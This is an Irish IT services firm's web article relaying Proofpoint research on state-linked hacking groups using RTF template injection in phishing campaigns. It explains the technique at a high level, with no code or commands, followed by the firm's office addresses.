Cybersecurity Breach 

New Technique To Power Phishing Campaigns

Cybersecurity researchers at Proofpoint say advanced persistent threat (APT) groups working on behalf of Russian, Chinese and Indian interests are using rich text format (RTF) template injections.

“The ease of weaponisation in this technique will also likely attract low-end and low-sophistication actors, expanding the presence of this technique in the wild, including crimeware actors” – DeGrippo

WHAT IS IT

The technique being used by hackers is easier to deploy and more effective because it’s harder for antivirus software to detect – and many organisations won’t block RTF files by default because they’re part of everyday business operations.

The technique is RTF template injection. By altering an RTF file’s document-formatting properties, it’s possible for attackers to weaponise an RTF file to retrieve remote content from a URL controlled by the attackers, enabling them to secretly retrieve a malware payload that gets installed on the victim’s machine.

HOW IT WORKS

Attackers can use RTF template injections to open documents in Microsoft Word, which will use the malicious URL to retrieve the payload while also using Word to display the decoy document.
This approach might require luring users into enabling editing or enabling content to begin the process of downloading the payload, but with the right form of social engineering, especially off the back of a convincing lure, a victim can be tricked into allowing this process to take place.

It isn’t a complex technique, but because it is simple and reliable to use, it has become popular with several nation-state hacking operations, which can deploy RTF attacks instead of other, more complex attacks, but still get the same results.

APT PROTECTION

Despite the “Advanced” designation, if APT actors are doing their job well, they will exert the least amount of resources and sophistication necessary to gain access to organisations, said Sherrod DeGrippo, vice president of threat research and detection at Proofpoint.
“This prevents actors from exposing more sophisticated tools if discovered, resulting in a greater operational disruption for threat actor groups to replace technical capabilities when discovered,” she added.
According to researchers, the earliest known instance of an APT group using RTF template injections in a campaign was in February 2021. These injections were undertaken by DoNot Team, an APT group that has been linked to Indian state interests.

FURTHER POTENITAL RISKS

While only a handful of APT groups have attempted to deploy RTF-based attacks so far, researchers warn that the technique’s effectiveness combined with its ease of use is likely to drive its adoption further across the threat landscape – and this could mean campaigns leveraging this technique are adopted by financially motivated cyber criminals.

For more information about this topic visit the ZDNet article or go to our Proofpoint offering

Our Locations

DEITG provides nationwide IT services through four fully staffed offices in Cork, Dublin, Sligo and Belfast .

Contact Us


Cork Office

Cork

Office 4D,

Northpoint House,

Northpoint Business Park,

Mallow Road,

Cork.

T23 AT2P.

Dublin Office

Dublin

Unit 79,

Cookstown Industrial Estate,

Tallaght,

Dublin,

Ireland.

D24 H317.

Sligo Office

Sligo

G2010,

Innovation Centre IT Sligo,

Ash Lane,

Sligo,

Ireland.

F91 WFW9.

Sligo Office

Belfast

Office 219,

Forsyth Hse,

Belfast,

Antrim,

N.Ireland.

BT2 8LA.